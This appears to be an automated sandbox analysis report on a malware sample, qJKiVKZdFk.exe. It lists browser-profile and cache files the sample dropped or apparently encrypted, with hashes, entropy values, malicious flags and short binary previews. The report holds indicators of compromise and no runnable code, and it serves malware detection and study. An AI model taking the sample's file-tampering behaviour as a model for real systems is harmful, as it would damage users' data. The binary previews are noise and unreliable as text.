                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):374
                                                                                                                                      Entropy (8bit):7.375889239657854
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pWDKgP2WudnO6CpP1o5uOJu8ZjgP/+H0I7vCj6T0OP3ukIcii96Z:K/Pxtg5uQu8uPGUI7vCgPukIcii9a
                                                                                                                                      MD5:73B5C47E21092DDC53853BB21E7E1A72
                                                                                                                                      SHA1:1628AD9B4042D3D99166D32D496BF41BA13FF8A7
                                                                                                                                      SHA-256:0B20AC92B9F41E585EBBD59FAD1976EDEA269A89CD8AEDABED26BC7C19FB243B
                                                                                                                                      SHA-512:5E94A941FBA27D3F37DD90FCEA8AEF4B12560A2E37AB074C295156C57BDDEB285576842A086BBA21BB76A0414E4B2737046AACF58386EDA593C2144BA901673A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:sdPC.y.8.E.Q*cm....S&o.IC_.]4R.I....Yp,...L.$.F.-...g~..J3K..M..b..].[.#.%.*MG}"....u.1(.7#..'....M.K.`5...c....F.m..(.,.%.u.....]...<..01H}.d...&+.b......m.G ..o$..<..%..L........L;../.."..6C...:~.n..B.....K..Ck....&a_......dC.....Q.\~!..\3f.&..?..'...}..../... e.-D...R....3...I>...D.ttp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):198128
                                                                                                                                      Entropy (8bit):7.998820371263127
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:fIxtB1DeSJSI47OIXGPtroNS/yKQGFHBkTH911yM3LoZCCzt4Tafi1pqBXCy9enI:AfSI4KIAgTf3LsCC+T+xVCvoZhhl+NK
                                                                                                                                      MD5:320AB2D95E2F453D31508D1D40FE6D2B
                                                                                                                                      SHA1:33C9F9ED0FF1DB3372F17EBFAACAA8247D5B13A3
                                                                                                                                      SHA-256:1E7AC55131F0C44B992CD4A6D5ADC85D617621E938DF17D7970175BE71F7C98F
                                                                                                                                      SHA-512:FDD4D37878F7EE383014C64ACB6B7D9DCBD57B8B42273084240B1887F67A39B4805CEE9787E58FD0C51FE4509E1F57C7CD7664455A409CAF9F603B397A1F4A1B
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.....p.....t..9..SP>>...............K...*....;......0........Z. .r.@-.`..0..8.....7I].v......k._.Z.....tD....MU:..&..tE. .@......}r..8... .%..\.i..0o....D...[......l.....2..cW..T.m..........2.....|.........{b....J_.+......I....xX!.s.........47.k....;....}i.YIdL.M.[O.[I8<..+5q....gf'....w...Q.8....i....b>C...Z."B..L..y|.fan........T./YF..K...B.pB)...u5...x..tLF.V.[1)N./<Aj.j..!.1..,[.6....,dso.p..7w..=...0..W7\Lp...0..S.<...Xn(l.w}mF.Y.......U....@..D..0.aun.=.*..!..T.....+...Y.cJ.J6...S>...`..].D+...\.Av.6R....xmV.}...$.k.a:6(..[..r.h.A.<...3>#..Z..4#B.%.d...z.[X.........v.......=.*.....Oq.=...3s<tv.a.r..r[...(f8.4..x\A.!.>..v.y.c..G......o.3...c..O.;.G.0...:.v..3.z_..Dh...hRl-...L@.59.Z......F.j>..N*t..7z.h.J....#~..2.....#CG...<..,.PR....>...r.=.......N.p..p..2..lm{sIi.z]l.B...ZEN.j.1_.......^.^NgE]-pX.<@.dl...*.8....B./s.Jp...&.t*....C..9...........T.qv.|...}f...P..]./..t<..P{74o..H.].....A.M8f.....[|.]H.C/..*.v.7M7`4.n;C...NC....U..#..I.yJ.0F.`

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.987268851255442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:/uYZuMkv5p+8Pv0IZkS9MTmrfsA7dZUBu2eFd:/jQMSLnPjLsAx2eFd
                                                                                                                                      MD5:D6F14AA43CE7FFE3B105C79F315F0E79
                                                                                                                                      SHA1:934D4F53817B931A01C668EEA7A959C5CAAB63F8
                                                                                                                                      SHA-256:98B6A404A177027A5810454E591203FE540BA90DD6580C43319D8A8285711014
                                                                                                                                      SHA-512:665584DB940650EF13314BFDAEDAA6D5A25231C06414683593956374D21CDDFE9A3D74A3746A39E5E61ED5D00D873BCFBB6C5849A079BD441020C6A0FD93A9F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit.W....`Iu.....5..l..J.T5D..Q.M.qE,.q.+(..[+.....<Fg.i6..:...#=.;s....\6.K.r...[C->:."(..1....'m...v.).........lB}.Q..)R.)m@.*.0....(....2...2..j....<..8z..9.;..9V3-J..!U.6..Dq.../..`.{. ..A.U7M.+Y..}..G....XG..}W3.D^.d....w..U....)m..L...-..N,...>..F...wTux.{....)...6PN1.\.|....K.d.i.?..'..-....#...A*N.~..Z...r4Uo.S.....n...Y.._.......;..l.Q>t'.j<.....k+..:3...`..)Jn8Au.......q..-.t...RQH._...|..2Lh.^.....-..."*...n.rw..c_R.JukL......m.t..Z.@.'...I.t.:A.....G4*.,yX...s`...7+..yYH$..69sh.`~e.d>.>.]c.s',.|..`.e......3...j0.\`..=../&a..\.^.@......`. ....{:,3..V.a.$.O.6..R..6E......U...m......w..:...)4.-..f.aB.t.Q..3.E.1b....;n..AF.*.0E.>>}.....NBW.....c...N.....\..../gG..h.j...5....i;.+~'..Gw..;........*.{.~....!....{..L...........lQ.^.r...d....`Y...|@.F.0&.,.....p5.f.yX.I..@..$.T...].o..})#TLi...3.SK.{.............;..a..pe..........zc9b..Q4.1.K6..$.fi..2..~.V..:v..$......8....eT.7e.>.[.....p.1.>..{.v...#..6..i...;....._...........0

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):372
                                                                                                                                      Entropy (8bit):7.277293046935115
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7HoZuYH1fqph1XGzSdfEDpSK33lRnFTek2RFcxAcrlaeDIfQ3ukIcii96Z:7HoZu+IxxlK3xeRuxJhukIcii9a
                                                                                                                                      MD5:F82653E3AA26D449ACB8F3B0E7351C4A
                                                                                                                                      SHA1:C11F07E695E80AC9CE8B39C00946DD71DA6223A4
                                                                                                                                      SHA-256:758AC42915B1C2ACDFA750E8F78FADD286633FCF452E708F123BD9D23ED11A16
                                                                                                                                      SHA-512:411625FE38BC756EA10BEEA6462DBE2E3F916D0C8044CC6A64909BEA1BADE5DCCA3144A0B832A80FFE1DC7C9B23A39C4696F2DB01CF2ED1C85A7CB528960D455
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........:...$....m=...`.2S6..P......C`p.....1.pE..J+.Rg.._{!]....J...W...GQFF@.U..'5.. .X.j..{..7.....1.Z.3&..Je`KDs...p.....)9...d.....X.....r^../a......g....-..B....oL......]..O.Dq..Z...ue........j..t..U...5.!!0. @...%....g.A.D.B.Q.n8.......B.F..........P..>....p!...m....3...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\IconCache.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):25803
                                                                                                                                      Entropy (8bit):7.991897709354727
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:4JPSWJRWNiTilG8+ch5zLA1hhCcjJNbfF5P:KPPqGimCzL+hhCMRR
                                                                                                                                      MD5:321472254C29A1B6060DD9A5583B63FB
                                                                                                                                      SHA1:7E3AF555059C4BAF52730C06A57AA6CA8A4B552D
                                                                                                                                      SHA-256:AD72A2CAA47DB42247B0EA20DE875C4AE1D055FBDFDB8E55F68CDD1219E8B586
                                                                                                                                      SHA-512:A5ABEF0C41831F88C65283F69CD85EDFDE3155294E0B69843B6C76CE2AC6EE66FB8F2DE3B9DAA787769ED099F6D876D808D863DA3834148C5B90DD8ADC2C438C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:H...W.8R......a...F...Y...-&2w...zw...7%...yN..h....O...%K..C._.........z47..j........%...n..h.t..(w...H...=..N.o.'.......8L.>..vQ{.. l....I.v.~S..L&.....t.x......j.*...F<.A..Pc...]{#..[3.v.......!...T:g..SRg..V.....p.C..........*....../..R.......R.8.z.@\8.#...3.R...Y...S......X$.j............Z./>....ZO.v.Z..Dh. 1..I .......7...Qw.s..#..z....S..]..{.W...Q.._..s[.ON.Yd..K. ..T.M.Cex.].=+..M R....C.lN......+..M.w....l..%.J<:;.!.h.\........~...6..8.t.eC._]..W.c.(....I_-..[..RN$.m4..Hz.....=....t..4..C.w.}.J....U..r.:..t.+._5..w...c...z...-.>._xy...b.R.....O.'\+.@..X....zOAZ0.{.....h.w....q.W.5.d2...Y^....{o`.....O.......3.N...>.#...E.e.U..o.|.AE..)...%w<.!....Vw],Fw..N.1....i/IA.M..W)./...Z....!.P"...z5_.........9.ha.#.N...F.....zR...P.(.?...........)u.7..}..M.u."W.w.j.N..s]......F..?....\>E..v.?.B....u.`...)....UN.f....R..{.7{...J..&.... ..)...\/.ZvT;s>.......&w....r.>T...{.&H....e.Tx-xh.z.......L.}.;j@Q.%..-.....Xd.9ArgNz_.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651BFF76-DF0.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5569509694885114
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:1YRlbpo0cVud7hysvZ9pvzMfb3w6ODfNEoWekjO6CKe3NTpxtmM:KoFkrzMfzCZjuOHx9ToM
                                                                                                                                      MD5:6551D96CF7CEEA89E3340DB7DD8399B2
                                                                                                                                      SHA1:E8AE71E338ED74C892979C9B9458F62CE70DDEE4
                                                                                                                                      SHA-256:371694AE737DC02D5F83D671D2651CE8BAD65ED080B63B9C1FCCD1936589E913
                                                                                                                                      SHA-512:D36DAB778333C14EDD2442C29A0C757CC16F2DAED10216D6B7626344834D1360681B091762209DAA0229FD531B7D8298D9FA72B2BC437405A7B6267365C9B748
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@....i.Y'(%..!..P..0IR^.v..6.`.v.x. d..7. .T.....EIb.kV/..0.5.ur.#......L.........hu.Y.-....-R..:...5.1C.()....5.zq.O.(......8AO..9..z..4.@[...$...9.....Em.....g@.....[f.UG..{......db..(cTh.b.~..$[".`....(G8....E'L8"K.N...."..@."..g../y.Oi.....K....b........k.......2...s.%.n...$^OW...t.1..V.t.'....j$u....$.0N..t...6rN..mVX ...S....BE..V...............A..%.uU.I..F...<I%.p......<.,......3jw.P.[.;......<.)..k.....Ug..R~h_^.Kr.w...u...^..v...-&^r......D".!..b)Vi.^.R..tf...xiB].\........FY..o.~aq.)...WtL.}j.....M=..&....Y.N.<..5A.X?.....|...8.4..HU...H].nP....^{....G...>..b)..@.|CV.h..3.`..._@........0.k../}f.A8.=(.O2~.f..}..Y..W.j....>.`..8,.........U..?.nNQ......?-...`..>..4\...<.#I..ek.1.S.?../..3..K.t.G.z.0k,.].G....x*.U..2.P*..cp+......t../.I..i..'[.Y."..e...&..?..{oh.iD..H3e..p..p6.4..#...(...3.Y..B.._...L..{^..:?.c.#..!?)Gsd"..x.u...4:.....T.....4,..$..Y../.F....~#...e.w.N...<.vT....!.`.rj....i..a.c.*.E9.G..Pwj\.j.....(...k^_<.....8..j..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C00B3-378.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184095667534541
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:SY+Rlo/2LZkOxedvhNuvN6DOiru3KFxZG/t2e6P3P06HrfhkczjL42pocFqy9ok8:SY+AO9kAeG8drucwFHw06LfdHL4J
                                                                                                                                      MD5:BBE4804E1E6898AF844E42330550732E
                                                                                                                                      SHA1:2FB58E0F2929E487C73074F4AAEDEC2EF11F2F69
                                                                                                                                      SHA-256:AF8CD662C2EFA8F896539393EC72B94B9B8C7361604026B3F1426D859DD39449
                                                                                                                                      SHA-512:8624315787B2ECF5F9A7403614A16639F5B6B80D3437047F3B739E410C0C5149390FF35C8391A0DCA6402FD3A8D6C9FAFFE4A81781F8042CF7A69040FB05BF1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@......wZI..5oqY7..rc..S.S....(..9H..#.P...g.....z..z_......).'f.t.1+K.......CT...yw.......&.w..w(^.Ya.Q.i. r.-.8.lN.v..:|.l`>...i.w=uRW7.?X3....2l.r8.l..........w...i..f.$.}+@..4f.`..*......d/N...s..B7.. .2...".z.W...!.g{`X1.........J..S.5m...K..U..}.B..Ir..R.....].....p-.....-~.S..p#..`..A..>..m.....i...c..wPd#....N.).v6Q..-G..([s....r9.......<.~.W)...)'.....k......'e....s...d...4.Xj3.......N........*..u.Sd..b......#,...d.0V;..1...R..JZ...MH.l..!Ax.~.T.q...U.....e.,\.n|NoM...8.....?..J..*......V~.K..a...{,.....ZH..5........g:Jxi.j..?...2.[n.-<.k....j..j.VJu..-.M..3.........W........@.z...........?.9..5...D..[.-e&....w.}uR.<.........V..5.].z+'..`/..3.K.Z.h.5....N..a....#).Q..|xf$.Nf............_.d..(......}..2DlB.`F.9...T........Mv.f.6.....C6....).8.A)%......v....J..\...J.......rL-.i..n&..=."...i.%...""..).......@w#..=.../."..^.L.Cs.......JHb.A.u7.z..dx.(.ccwN.).....Fk..L.X..E8E...w...JCs=..d..[....7|2b^pa......w..........

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C00B3-67C.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184820873763863
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:6PS5IEVmqlFR8XvaaF9l6omZ0iMkyZJAQazCTxqjpqJr/t+3fYx:6PXsFR8XvAbWJAQagqjpqJrl+vC
                                                                                                                                      MD5:03B934E7090141CC762EEF0A726A6CB9
                                                                                                                                      SHA1:DBFCFDEBD7C5BCF510840E3D9C004512104D06D2
                                                                                                                                      SHA-256:54DFECD069892CCF6B05546EF51BBC9C8240142D50A1782269087AC6BD928CF4
                                                                                                                                      SHA-512:C870595F09C52BB5CADDFB333602C38FCE247A2B75E64D3FD63CC2BAB26243A983E840E8E4DFA22AB9A0B2E1B2765AFC6FCF594AD51C2DD42215BD30BC1D1E71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.....C.......D.&#....'...Q...2...f..]A.."f.V..,UM......Gr?..#......L.....r.&....t>.6]....)C..Q...'..K...9U..!.......&...p.E^........!.Z...s...E.3$...iM7.uC/..b.P..*Io$....%..8s.....A.>..:d..@.I.`.......x....r.~Q.*T..@..B+.q..QZ..:..9......Q...=KO..~...Te...fh.e_>.~..k.0N..".....L.!<.r._.xzR.;Zy.%.|....U.C..jD..:...l..^...B.<T..U.$.+......!.ZD[.}..q..........,........~G..V..(.g..].t.......3..zx......?..../.......p...(..u....Z.B.I{8....5..p.s(.?. Q.K#...4..4..T.,.Z!.(5<, .C.@7.|.m.l....6..)^.N..p.Q.3..=..._..$.+n.,.k......D|."o.D-...(.c.j]?...MR.w...j....%..-}..1..^.....).P...A".....UT{.......~..P.....=.7.XNi&o..y..!..#e4.G.|C.M......pJ.4.Ky]).c..y\..B........|...U%..f_.......s...H{..p.k.K..uu-...@..,.,.....d_W.z\......8....../.9@.k...T.bQ.t....@....;&.I=iE.(.i)..}+.....O...[.&O...-6.[.MH.....w...`..}5.:.....e./ ....<..;..)..y...U...Q`.9.S...%z.t.J...S.|.n......q.4....K..p....../...=x...$.m..T..).<.....2G.G .....?a.'..hi..d

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C020C-1B28.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185435106025285
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:m4OyqPAOyvwn2OFVIO2fsEA7JnCcwzUpJrqTnTcQsoW11V:m4iYOY+28VlrLq/c1
                                                                                                                                      MD5:7EFECEB68A6428D18A861724309ACA93
                                                                                                                                      SHA1:4E72D889A4D83B33B4F160834413203144569BF8
                                                                                                                                      SHA-256:EB6C82F6F04F8B2998DF33CE9882E2B523A0D3F6E207DA73857BDBE401A6A711
                                                                                                                                      SHA-512:D905294AB1A3BD299A78D5B068CDE6562733039ADA58D9780A5C51C8BB103E380E4B17018E058784C66457F280909ECCB38307BC51444FB2CE5796D1986F28DC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@...gM_.c..^P..]...Bo........O"pv....&.[...G9..% .'..'..=k...b]..H.=.....[Td..."....(.7.<........}..9..F.]............6r..Q[.....W.#......R.."G.....B1.".4...+....{J28...<.Q...............6.,oV.U.$.u).S..VRn....... @..q.G...H..<.0.....#g....%6BH?..$..P..lHm.Bw..@.T+.O.2N.!...G..............m..H..'.....0`..>.+.[jTK0.. ...*..5..T.9{.....{.S...3..P)....X....".z~z......6K..........Yf.....~.d..4.B.abE... .W.w>z,@..Mb...L...|..Bq"......<......._..B...%j.s..2z..b...Z.+..........F..%......i..}....f..=.i.Sdz.......J.K}..(Q...d}T.y.)._`.B.Y...@.7...$J`[4C.1^.U...x..m.7.A+@z[..&...`..-..vr.A[.`.%.h.s.|(..?........aAP|.......9L..T.5.&....].lm...Q.Jt<$...r!.Q.i..........}B3.E...=...|.0.3h...............nxU?r...b.m.x..lw0~.(.9..}...\$.. a./..b ~.eq..ys...Wb..7...T..I4}.. >`n.W...h..l..p.Z.,-.J;.....O.0.C...<]S...|&3...k....L..mE..~.[./V....&.p<G.....).w?.lFF(&.......=..zH..Z.A...f.......EY......c...h8f....g.x.6/..|...H~u.....0.7....dDU?....(...jB...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C020C-B60.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184221340792955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:hQVjPApGlHm4XLLxJoZoVe5wWdvKzISwrwXpRiAvjMoGmVbR:hQlYpGl7xJoSWxKkSwEXj4oGmZR
                                                                                                                                      MD5:FC75F4C3259BF85625E13EFB43242339
                                                                                                                                      SHA1:EBDEA57E9062764BFD12C478D79BCEDB7FEC09AD
                                                                                                                                      SHA-256:531C6A4AE05ED5D8AF7BFDBEFB4195332E769C4C39EE8D5FA1C3CAEA18F556B6
                                                                                                                                      SHA-512:795A36E26E465A28D3146C4643016DA29D971D372D78BBE7FAB08218E4FBB1DB4088585E8CA81233C855A1D8BC1D7342EE14B3737415D27E9AB7C12D0D6920C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@./..g..{..-..M....P.'s&t...F.5....t|..M.]B..~....FZn.gU.uJ......B.7/...-.*o.hS..(k0.-..l.i8.;....."]|..D_.....`.{#M..B....i..QU.Db......-.hLj......)C...h..q.....9.1b>J..R...._F..m\.... ...L.."...,....VI.'qj..n.B%)....H.@Tj...}.<.s[+...._.;y....}/.&....Zb".z...3.V.9.89&H..T..!......?!....e.b2\y..e0..3.".8....(t...K..M,u...........w3<.r.[1. y.Q......l...m..W.S......^.M5...m...n..(..Y..~;...+.q..@^..v8.r......Nhly/j}.R$....8$&.z.l6 ....>.N...rd.t.9...$.8_. C....?..;...n{........Q.p+<..wmnK!..{.+.M.....Iq;K/..I...p..=..r..d.nm.cz...P_.E......{.UH..l.....1a<W..W.x5.2g:..'..~J .<p87c9!.F.k.OB.d%..K.c.E.&P.;t<...4.p..4Ju....9.$.w..B...<.q.tD...u<Z.G=..u.r.......R..X....].......X..f.M.z.c..x~..+?......w[U..Y!......mzS.x.H..B..7.W....z..Yp.Q..HC...S.h..B./.l..z9I...r..Q...7 _....v58...W..*..g......BF..R..w.).D.. .ds..g.}}v=.=.?!.;...Us.t..$..]...~.qu..VK.e.."..B.h..lD..."R{mac..,.Q.,...K.1..4.W..".=....A.<...... ..j'W#o........T.....:..>.Q.4.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C0537-1BBC.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.518428583629598
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:eaqqCViWc3cNd2T2zjXueYtVBwoyz/4KlGu20RKuctB0DkYlNp:qjViWhkTsaeQ5u4sGuncwkYF
                                                                                                                                      MD5:18E25E216C4019CF0F1FE42F27C8ECE8
                                                                                                                                      SHA1:76B06F346168BACE172DED9B230A9090F7C26B84
                                                                                                                                      SHA-256:0A1EB002FCFAB16BB1E1A96E4B80B66F4DFEC81D5EF246D1F086B1945460E236
                                                                                                                                      SHA-512:C4B41F422FBC08ED3977D2183C2F262892428C33978D1A26DADB873E7946B79101683824A9B88FD4FB0432AECBB2AA6A74FA6E23F1F6087ABF812926076FF267
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@....S..k~*d.^".U..g...R.*...Ws.RJ\.......K!g!...8.+..w\.[.Kf.E3.B.b.....61.1zbo.O8qP^...+#.]4.r....A.3.5...5Y..Y.V&?.$...V.%b37..m?...#...SD....rS..:n..+.1..[....b.@.1...Lv....q... ..G..a.....>.-.n..f.djOu..x..u..Z.}@..Sk8..m...B....;. ...C.5h$.,.a4...i..&n.]bm/_@....$y........X.7.y......B...../.....`(..R.U.W..+.....9t<.`.r.E.d'..|y....;....}.X...s.."8./...s.F.,'_.X.Q..9..%u'...F..E.O.d......0....nV]n......}.Yv.......x.S..\..............kQ..0/.Qa@."..>I&BJ:E[.{8.....O......u..;.2..x..,(....O...u..s$._..Q."G.......jp^..vY.S....KX.%id.|D..)...I..`q.n....?.VE......{.......d.O.qtAH..........qk..%..1..>.]....,.d3c.3X.*....Bp&..n...t.....f."i]..gB...../.).H.sju...b.G.bF..'..H....Y..j.|.oP*.......D....|..o....4..].....'..~cm...\jX.$'4.!.`D...l...U.4.....j....b~...o..=x..!N...=..z.R..G..j.L.P.....eO.......|...US..Kee+.-&...`.7Y>~.>...a......&..c..._. .7....._D+...J...b......P.f...ZU9...Y.N.'f..$..g...6....u(5..4O..G..`{).B..P.....W...U

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651C0537-1BC0.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5183686981378691
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:u5QupmpcO36Ip33wvDIu2Nf63lDYiuy54ApB8bUeME3GM:S0Cw6IpHnu0OYiuS0bUe3h
                                                                                                                                      MD5:5B726368C73962730056AD4EF3A46D4C
                                                                                                                                      SHA1:4899F1F112081AD4942CC21A0A92660A99532348
                                                                                                                                      SHA-256:AB3E5B12A0EAC15CAFE99899459921C828BB05F31785890B28E9A9117F284E8F
                                                                                                                                      SHA-512:3D742D3736A7FEF1D3B16F745E53A144337A8564427532EA3827C62989DD99DAC3CF84AF7A5F816752AB307BE115B3C68BF8DDD39FD4DAF07832B6D20700A07D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.5.....2lY.F..n..2.....S.yG9<n.|Lx."...~./5!w.Gh|...hX...H....$....w....'7..D....?oB.... ....|.0..zP....89.b....k.........h.u/$W..I..W.l....p.y.A.-.PB..Fq....0.}.4mD...7....y.......Z'.].\.....EE...l..B!.'....g.pE..nx......A../.............E..~@.,.&.<...6`,......B8.D.%Z.S8<.:K..$L0....16.nNJ..K...4P..-.xn..+..|..._.u..z...l...<.....J.jUt.". <!.\...._.6..&..sM."..$zZ.."m..3j"p...i6OT=.]0... ..Bl.,....4u....<...b.w#.IbT5.M.....N..n....c...m...T.(#u..G_....t7.kYCi....v.l.8..h..KU..;......{..........c..IL..tx.^.....#~Y.jR+-P...u...j..s..:..%..q....~......G...U:3O%..+.:...5....X...3...=`........... ...g.P..B..G..@.?..c...o..{s...qP....S..r.6..C,.!.5W@l .o.f.......H..R..3......L..~.:........k........O.:?...n?.......j^..Fh/......N..z.FdQ....&..8...z.7...l..L.'..2....~.I.:7'..m.&.E..&..k...f*Cy.X+c.xlt..zK...nz.......'......~.:...q....(y8....W.\.T..YL..bT\q.{..........|Z!0`J..A.."E...4(.I-...pH.x.G.m.....Hg.........(a..X.%..<gc%r.b.B.:..^:]..8*

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D22E2-1DAC.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185740642424135
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:jOVC8h15GtMQVVkldi1S6JPuRTeTudXJCnHi23sXMi08AATlZN:jOV1hjGtbVSU1rJPieTudXJFJpOw
                                                                                                                                      MD5:BB3C4A5CFE8619935427B2E04A3261C9
                                                                                                                                      SHA1:A0BFF30F693EE2C439F294A062B1BC9000BF026F
                                                                                                                                      SHA-256:6C7BFD8C9C46DF7ACEE9AC37A4473B720DBD7FFE715E55295EF1E3377B794316
                                                                                                                                      SHA-512:60C39EB0D1E3575B7186D3003506A31378D385B67FE34FE6FFDFC72D154409D9331CCDF8704AB95B9E9AF0DEF8870C7BE847F81A9EA971035770F00B27CF54BF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@...X.e.l....Z..).<.p..Y....bGC...w.f#i\.......T.)......]..h.].C&.W..BX!C..@..#.:.......~...v#.!$Q.a.Ok&6...C:........q.E.@ 4^...L...W.,D6g..d.../z...qlO...(.B.r(.;.Z..P.(.;P)..7 R..%;...ol..7.....h.TQ."...I..J.v..,..,f.9y_b...z.&...[... '.k.qc.`.Y:...T.V=m,iR5h./.Kk.l.7.........$a...v...O.RN...a..Ma..6...jab..d.....)q..Ga<+.$S.....UW@.(".<.s.Y....V^......o..R......^N..e.gu...../.%...X....z.].,x..,n.g...PM.."a...mb.3.2.s."....W...x.......@z...=-..NF....4....U.3..]^.z<.X.K...........V.sC..zZ>B......%....Yf.6....c...p.....Y...Cn...[.(.k|.F.3.......w..9.)...7:...v....-Q..|..F.l=....L...........A.4Z"&}..9.AX.{...:Zi.7q{s5.....u.A.{.N..Sp.....V....X..D...sx.'.N...m......V{"yu...Og..9.....Z.....9...l....6...c.f.[...Hp)..JX.R.....>f\.F....W..k.=........k..h.......,.E.8..F.j.....w.-...{.F..A....@Y.^..i..+..UVd\...20...r&Iz.,....W.2.....o.ttH....^.L..W......*...n..:O......WYPD.e}B..F]|.Ie....Qi.RA.....>:%..xI6D..f.^)...p.v..1~...8.TMr

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D22E2-A84.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184201588055352
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ZE1w9ZBjh0i0Q2jHkFzMjsYP7Lk1tGdX3g3dS4LlYoNdSZv+LkIqzB:2127haHhHTLvng4MlYoPSZvn
                                                                                                                                      MD5:8194E1CE65C518309319DF89B28BA0B3
